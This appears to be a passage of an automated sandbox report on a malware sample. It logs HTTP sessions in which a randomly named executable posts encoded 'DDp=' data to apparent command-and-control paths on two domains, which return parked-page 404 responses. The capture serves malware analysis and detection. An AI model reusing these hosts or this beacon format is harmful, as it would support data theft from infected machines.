                                                                                                        Nov 6, 2024 08:42:06.056847095 CET1236INData Raw: 61 20 64 65 20 70 72 65 73 65 6e 74 61 63 69 26 6f 61 63 75 74 65 3b 6e 20 63 6f 6e 66 69 67 75 72 61 62 6c 65 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 6f 6b 22 3e 3c 2f 69
                                                                                                        Data Ascii: a de presentaci&oacute;n configurable</li> <li><i class="icon-ok"></i> Directivas "Meta" para mejorar tu posicionamiento SEO</li> <li><i class="icon-ok"></i> Redirecci&oacute;n Web con URL fija</li> <li><
                                                                                                        Nov 6, 2024 08:42:06.056855917 CET224INData Raw: 22 20 74 69 74 6c 65 3d 22 53 c3 ad 67 75 65 6e 6f 73 20 65 6e 20 47 6f 6f 67 6c 65 2b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 67 2f 69 63 6f 6e 2d 67 70 6c 75 73 2d 73 6d 61 6c 6c 2e
                                                                                                        Data Ascii: " title="Sguenos en Google+"> <img src="./img/icon-gplus-small.png"></div>Google+</a> </li>--> </ul></footer>...TERMINA_PIE_POR_DEFECTO-->... end foot --></body></html>0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        39192.168.2.650023217.76.156.252804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:07.686288118 CET1838OUTPOST /qutj/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.cesach.net
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.cesach.net
                                                                                                        Referer: http://www.cesach.net/qutj/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 32 38 68 42 75 6a 38 75 4e 59 6e 34 49 33 69 77 34 38 68 77 4e 43 6f 64 37 64 35 46 4b 73 58 58 4a 41 33 58 6e 58 57 54 49 74 55 68 4e 62 63 73 52 4a 36 71 59 6d 49 42 64 4a 69 31 6b 69 5a 4d 32 31 6c 38 4b 66 59 71 32 70 54 56 49 68 4d 43 5a 30 44 39 41 4a 42 34 35 67 73 69 36 55 35 72 73 6a 76 52 6b 4b 32 2f 6f 78 53 7a 52 48 5a 33 6c 39 36 6a 59 70 53 31 6f 78 41 33 67 68 6d 74 37 2b 53 67 30 72 53 34 6b 31 52 71 4f 53 6d 4e 73 4f 35 71 77 68 47 35 71 77 4b 49 74 31 59 70 6f 62 64 43 46 77 4f 36 46 70 6c 61 50 63 5a 41 56 36 43 6c 63 74 68 45 72 4d 75 56 2b 71 75 79 4f 78 6b 57 43 2b 31 61 72 6b 59 75 76 46 38 4f 6d 6e 70 63 7a 6d 54 62 53 45 73 67 4d 79 6a 75 75 50 35 49 32 59 2b 64 59 69 70 2f 50 53 59 55 34 52 71 64 49 62 38 51 51 68 44 30 4e 4b 63 42 48 54 36 45 7a 76 69 59 64 56 51 38 49 43 46 4e 69 35 63 31 57 2b 38 46 72 72 39 68 71 59 59 6d 34 47 7a 39 4f 38 61 68 53 63 6b 52 6b 50 6f 4f 4e 33 4e 55 45 31 4f 39 35 45 63 6d 44 62 6a 79 39 38 32 59 42 73 72 66 42 55 55 59 50 62 [TRUNCATED]
                                                                                                        Data Ascii: DDp=28hBuj8uNYn4I3iw48hwNCod7d5FKsXXJA3XnXWTItUhNbcsRJ6qYmIBdJi1kiZM21l8KfYq2pTVIhMCZ0D9AJB45gsi6U5rsjvRkK2/oxSzRHZ3l96jYpS1oxA3ghmt7+Sg0rS4k1RqOSmNsO5qwhG5qwKIt1YpobdCFwO6FplaPcZAV6ClcthErMuV+quyOxkWC+1arkYuvF8OmnpczmTbSEsgMyjuuP5I2Y+dYip/PSYU4RqdIb8QQhD0NKcBHT6EzviYdVQ8ICFNi5c1W+8Frr9hqYYm4Gz9O8ahSckRkPoON3NUE1O95EcmDbjy982YBsrfBUUYPb7FFa44/7v4VmVsufMjoAFLiKcSj3AWggWGN7Z/TJ0uoxCOz8tw9M/V9iEFxTY0WxVtCvxCGo7TR8hqzIsTuPN9yZRyVe0RljVUc5V2oSZkY0Ffe2KKdwrjrgnvQddyVtTeQBLaxzRrE2RVfea7oFQwjs2XRtBAKz8g83+gEwgW3+9vMkCiiUb3VWXTYwrXZPRJloTzvE08QSqIHbaDPEC7YfKbxOZz4RHL0lKXxF35AKFvOX+wR7U18Ur9iIcXhhm6dMWR2hknZw7vu/iqEx+tyuCa8+omvlb13z5DUgCl0ZQsTtW95cB5tFTPAWl6bbS57poxL4bEPZ/t0IYNqb0pj1+7uhen8PDehzsJu+udntyzZ4hrpC01gkQoWmn2TxGH61HkfNC4N850I0ox0wufmJfRMQi/XfUrV51cC83CMf6tF/9LYq7XpmTjFkHz/8EJIAbN4D2MZoG+RX5kasZTvWxYjVMDsUXugARLfaY1JgqGh/vugYPO21aD1qimKYEyQwmkxupIdz9zAzADoDu2a4eZ9LByk+CZD0N+UEvES+1kcQdYHVZaG0zU8Bt5hiDyDiyqvIrU+44oM+Mw4scjUwCsy3J0D5otNsG8DwZvE2MilF0TY8o0jKKm6vCxy9nNuvz3d5n5UNuHKrJyEIdmx2af4+oOzzUh [TRUNCATED]
                                                                                                        Nov 6, 2024 08:42:08.558403969 CET1236INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Nov 2024 07:42:08 GMT
                                                                                                        Server: Apache
                                                                                                        X-ServerIndex: llim603
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f [TRUNCATED]
                                                                                                        Data Ascii: 1a9b<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.cesach.net</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> [TRUNCATED]
                                                                                                        Nov 6, 2024 08:42:08.558455944 CET212INData Raw: 3c 68 31 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e
                                                                                                        Data Ascii: <h1>www.cesach.net</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL--
                                                                                                        Nov 6, 2024 08:42:08.558470011 CET1236INData Raw: 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41 4c 2d 2d 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d
                                                                                                        Data Ascii: >...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header>... end client -->... foot -->...COMIENZA_PIE_POR_DEFECTO--><section class="search"> <div class="center"> <di
                                                                                                        Nov 6, 2024 08:42:08.558485985 CET212INData Raw: 63 74 6f 73 20 65 6e 20 6c 61 20 70 61 72 74 65 20 69 6e 66 65 72 69 6f 72 2e 3c 2f 70 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 61 73 69 64 65 3e 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 73 69 6d 70 6c 65 22 3e 0d 0a 20 20
                                                                                                        Data Ascii: ctos en la parte inferior.</p> </div></aside><section class="simple"> <span>Nuestros Productos</span> <div class="line"> <div class="center"> <a href="https://www.piensaso
                                                                                                        Nov 6, 2024 08:42:08.558732986 CET1236INData Raw: 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 77 65 62 2d 73 65 6e 63 69 6c 6c 61 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 77
                                                                                                        Data Ascii: lutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=web-sencilla"><article> <img src="https://piensasolutions.com/imgs/parking/icon-web-sencilla.png"> <h2>WEB SENCILLA</h2>
                                                                                                        Nov 6, 2024 08:42:08.558748960 CET1236INData Raw: 64 65 20 75 6e 61 20 6d 61 6e 65 72 61 20 72 26 61 61 63 75 74 65 3b 70 69 64 61 20 79 20 73 65 6e 63 69 6c 6c 61 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 3e 76 65 72 20 6d 26 61 61 63 75 74 65 3b
                                                                                                        Data Ascii: de una manera r&aacute;pida y sencilla.</p> <button>ver m&aacute;s</button> </article></a> <a href="https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa
                                                                                                        Nov 6, 2024 08:42:08.558764935 CET424INData Raw: 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 3e 54 65 20 6f 66 72 65 63 65 6d 6f 73 20 73 69 65 6d 70 65 20 65 6c 20 6d 65 6a 6f 72 20 70 72 65 63 69 6f 3a 20 64 65 73 64 65 20 65 6c 20 70 72 69 6d 65 72 20 64 26 69 61 63 75 74 65 3b 61 20 79 20
                                                                                                        Data Ascii: an> <p>Te ofrecemos siempe el mejor precio: desde el primer d&iacute;a y desde el primer dominio. Adem&aacute;s tu dominio incluye:</p> <ul> <li><i class="icon-ok"></i> P&aacute;gina de presentaci&oacute;n config
                                                                                                        Nov 6, 2024 08:42:08.558780909 CET1236INData Raw: 52 4c 20 66 69 6a 61 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 6f 6b 22 3e 3c 2f 69 3e 20 46 69 6c 74 72 6f 20 41 6e 74 69 73 70 61 6d 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: RL fija</li> <li><i class="icon-ok"></i> Filtro Antispam</li> <li><i class="icon-ok"></i> 5 Cuentas de correo redirigido</li> </ul> </a></section><footer> <a class="logo" href="https://www.piens
                                                                                                        Nov 6, 2024 08:42:08.558799982 CET12INData Raw: 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: html>0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        40192.168.2.650024217.76.156.252804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:10.231962919 CET547OUTGET /qutj/?SvrLY=3P8lALA&DDp=7+JhtXYoap6hQUSymN1iKxwf+aYIN87BChjykmSFD5cBOLIEN7eTZiNCYJGnmhE2/2tIBPcr+sPRMyccTmjbMYtkzAsmzkJCtDvOtemIhBWnTn54lM+8e5KyjQNsphyX8LHz3fM= HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.cesach.net
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:42:11.111923933 CET1236INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Nov 2024 07:42:10 GMT
                                                                                                        Server: Apache
                                                                                                        X-ServerIndex: llim603
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f [TRUNCATED]
                                                                                                        Data Ascii: 1a9b<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.cesach.net</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> [TRUNCATED]
                                                                                                        Nov 6, 2024 08:42:11.111938000 CET212INData Raw: 3c 68 31 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e
                                                                                                        Data Ascii: <h1>www.cesach.net</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL--
                                                                                                        Nov 6, 2024 08:42:11.111949921 CET1236INData Raw: 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41 4c 2d 2d 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d
                                                                                                        Data Ascii: >...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header>... end client -->... foot -->...COMIENZA_PIE_POR_DEFECTO--><section class="search"> <div class="center"> <di
                                                                                                        Nov 6, 2024 08:42:11.112126112 CET1236INData Raw: 63 74 6f 73 20 65 6e 20 6c 61 20 70 61 72 74 65 20 69 6e 66 65 72 69 6f 72 2e 3c 2f 70 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 61 73 69 64 65 3e 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 73 69 6d 70 6c 65 22 3e 0d 0a 20 20
                                                                                                        Data Ascii: ctos en la parte inferior.</p> </div></aside><section class="simple"> <span>Nuestros Productos</span> <div class="line"> <div class="center"> <a href="https://www.piensasolutions.com/web-sencilla?utm_so
                                                                                                        Nov 6, 2024 08:42:11.116682053 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 77 65 62 2e 70 6e 67 22 3e 0d 0a 20
                                                                                                        Data Ascii: <img src="https://piensasolutions.com/imgs/parking/icon-web.png"> <h2>MI P&Aacute;GINA WEB</h2> <p>Dise&ntilde;a tu propia p&aacute;gina web de forma profesional y de una manera r&aacute;pida y s
                                                                                                        Nov 6, 2024 08:42:11.116700888 CET1236INData Raw: 3c 2f 64 69 76 3e 0d 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 6f 6d 70 6c 65 78 22 3e 0d 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 69 65 6e 73 61 73 6f 6c 75
                                                                                                        Data Ascii: </div></section><section class="complex"> <a href="https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominiosblock"> <span>Registro de dominios</span> <p>Te ofrecemos si
                                                                                                        Nov 6, 2024 08:42:11.116735935 CET648INData Raw: 6b 2d 73 6d 61 6c 6c 2e 70 6e 67 22 3e 3c 2f 64 69 76 3e 46 61 63 65 62 6f 6f 6b 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d
                                                                                                        Data Ascii: k-small.png"></div>Facebook</a> </li> <li> <a href="https://twitter.com/piensasolutions" class="lower" target="_blank" title="Sguenos en Twitter"> <img src="https://piensasolutions.com/imgs/par


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        41192.168.2.650026161.97.142.144804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:16.362225056 CET810OUTPOST /knx2/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.030002128.xyz
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.030002128.xyz
                                                                                                        Referer: http://www.030002128.xyz/knx2/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 52 7a 64 6c 38 64 48 68 4d 45 32 31 72 4e 53 6e 32 43 66 2b 74 48 44 44 30 4b 35 46 77 32 30 55 44 51 46 62 48 38 6d 6b 34 35 2b 7a 32 61 6a 46 35 62 75 71 4d 4a 71 44 53 76 4f 6b 59 58 41 4a 53 71 51 41 38 48 59 76 7a 78 2b 66 51 67 78 2b 44 4e 6a 53 6d 2b 34 33 4d 33 58 4f 6b 52 2f 71 2b 71 30 49 42 4a 66 56 54 4b 74 76 59 78 74 61 76 46 61 64 6c 58 74 32 6e 4e 69 64 4d 6d 4a 4f 77 4a 58 44 5a 53 2f 4c 55 7a 53 47 50 36 62 49 77 65 66 6c 4f 64 73 67 68 7a 6c 48 71 52 62 33 32 6d 46 67 58 75 36 50 74 38 35 5a 38 50 31 4b 4c 4f 53 6c 43 43 38 6d 78 46 6d 37 4d 79 34 2f 73 66 67 67 47 51 6b 2b 4b 47 50 70
                                                                                                        Data Ascii: DDp=Rzdl8dHhME21rNSn2Cf+tHDD0K5Fw20UDQFbH8mk45+z2ajF5buqMJqDSvOkYXAJSqQA8HYvzx+fQgx+DNjSm+43M3XOkR/q+q0IBJfVTKtvYxtavFadlXt2nNidMmJOwJXDZS/LUzSGP6bIweflOdsghzlHqRb32mFgXu6Pt85Z8P1KLOSlCC8mxFm7My4/sfggGQk+KGPp
                                                                                                        Nov 6, 2024 08:42:17.392944098 CET1236INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:42:17 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        ETag: W/"66cce1df-b96"
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                        Nov 6, 2024 08:42:17.392961979 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L
                                                                                                        Nov 6, 2024 08:42:17.393080950 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        42192.168.2.650027161.97.142.144804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:19.103229046 CET834OUTPOST /knx2/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.030002128.xyz
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.030002128.xyz
                                                                                                        Referer: http://www.030002128.xyz/knx2/
